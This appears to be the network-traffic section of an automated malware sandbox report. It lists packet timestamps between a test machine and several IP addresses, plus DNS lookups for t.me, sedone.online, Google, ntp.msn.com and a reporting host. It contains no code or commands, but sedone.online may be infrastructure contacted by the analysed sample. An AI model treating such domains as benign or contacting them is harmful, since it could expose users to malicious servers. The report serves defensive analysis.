                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.305865049 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.321888924 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.762788057 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.763391972 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.763402939 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.763506889 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.763643026 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.767973900 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768004894 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768143892 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768156052 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768166065 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768256903 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768296957 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768307924 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768317938 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768328905 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768466949 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768479109 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.768810034 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780040026 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780170918 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780183077 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780267000 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780277014 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780288935 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780379057 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780390024 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780400038 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780474901 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.780622005 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.783638954 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.785614967 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.789454937 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.789904118 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790323019 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790395021 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790407896 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790549994 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790571928 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790621042 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790632010 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790642023 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.790950060 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.794487953 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799464941 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799559116 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799696922 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799709082 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799720049 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799737930 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799747944 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799760103 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.799917936 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800071955 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800084114 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.800337076 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.802546024 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809160948 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809288025 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809300900 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809360027 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809370995 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.809423923 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.811722040 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:23.817389965 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.161990881 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.166841984 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.166935921 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167000055 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167057037 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167072058 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167169094 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167181015 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167182922 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167193890 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167344093 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.167356014 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.170000076 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.170548916 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.174055099 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175082922 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175123930 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175235987 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175277948 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175288916 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175335884 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175538063 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175673962 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.175684929 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.178268909 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184926033 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184959888 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.184990883 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.185003042 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.185173988 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.186321974 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.188596010 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189026117 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189096928 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189189911 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189224005 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189280987 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189292908 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189399958 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189410925 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189428091 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189532995 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189567089 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189580917 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.189646959 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.196666002 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.196795940 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.196862936 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197030067 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197099924 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197112083 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197169065 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197272062 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197279930 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197295904 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.197308064 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.199781895 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.199831963 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.199845076 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.199954987 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.199985027 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.200077057 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.200088978 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.200176001 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.200190067 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.236948967 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.346060991 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.346612930 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.346714020 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.469439983 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.482290030 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.497116089 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.502276897 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.502341986 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.502376080 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.502409935 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.502696991 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.508706093 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.536144972 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.661416054 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.666848898 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.666868925 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.666898012 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.666909933 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667053938 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667064905 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667074919 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667088032 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667294025 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667306900 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667329073 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667339087 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667402029 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.667627096 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681051016 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681076050 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681087971 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681098938 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681111097 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681122065 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681529045 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.681644917 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.703617096 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.720570087 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.725298882 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.785063982 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.791373014 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.791486025 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.791584015 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.791614056 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.792020082 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.798899889 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.803705931 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.803740025 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.804008961 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.804122925 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.804174900 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.804208994 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.804308891 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.825184107 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.831679106 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.831701040 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.831711054 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.832016945 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:24.871642113 CET56668443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.029894114 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.030129910 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.035636902 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.035674095 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.035687923 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.035876036 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.035934925 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.040708065 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.074022055 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099133015 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099199057 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099517107 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099524021 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099538088 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099725962 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099805117 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099910021 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.099967957 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.102997065 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.103562117 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.118038893 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.134108067 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.171760082 CET4435666823.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.376130104 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.462013960 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.466706991 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.466978073 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.467808962 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.467973948 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.468544960 CET58964443192.168.2.723.58.157.24
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:25.813575983 CET4435896423.58.157.24192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:26.305994987 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:03.951085091 CET53576171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.026245117 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.027745962 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.028841972 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.029247046 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.965058088 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:05.965172052 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043490887 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043531895 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.043870926 CET6330753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044020891 CET5924653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044184923 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.044229984 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.112613916 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.113291979 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.155347109 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283457041 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283529043 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283588886 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283626080 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.283912897 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284148932 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284199953 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.284388065 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.285028934 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.285550117 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358418941 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358527899 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.358764887 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.388185024 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.431185007 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.490216970 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.599199057 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.599267960 CET44362679162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.640167952 CET62679443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                Dec 16, 2024 15:41:06.673445940 CET44362679162.159.61.3192.168.2.7

                                                                                                                                                                                                                                                ICMP Packets

                                                                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:06.018903017 CET192.168.2.71.1.1.1c24d(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:28.827749968 CET192.168.2.71.1.1.10xe9d3Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:31.156423092 CET192.168.2.71.1.1.10xbfd0Standard query (0)sedone.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.774465084 CET192.168.2.71.1.1.10xd87dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:39:47.774736881 CET192.168.2.71.1.1.10xb08fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.329718113 CET192.168.2.71.1.1.10xc692Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:02.330032110 CET192.168.2.71.1.1.10xb77bStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                Dec 16, 2024 15:40:04.999963045 CET192.168.2.71.1.1.10x3e4dStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
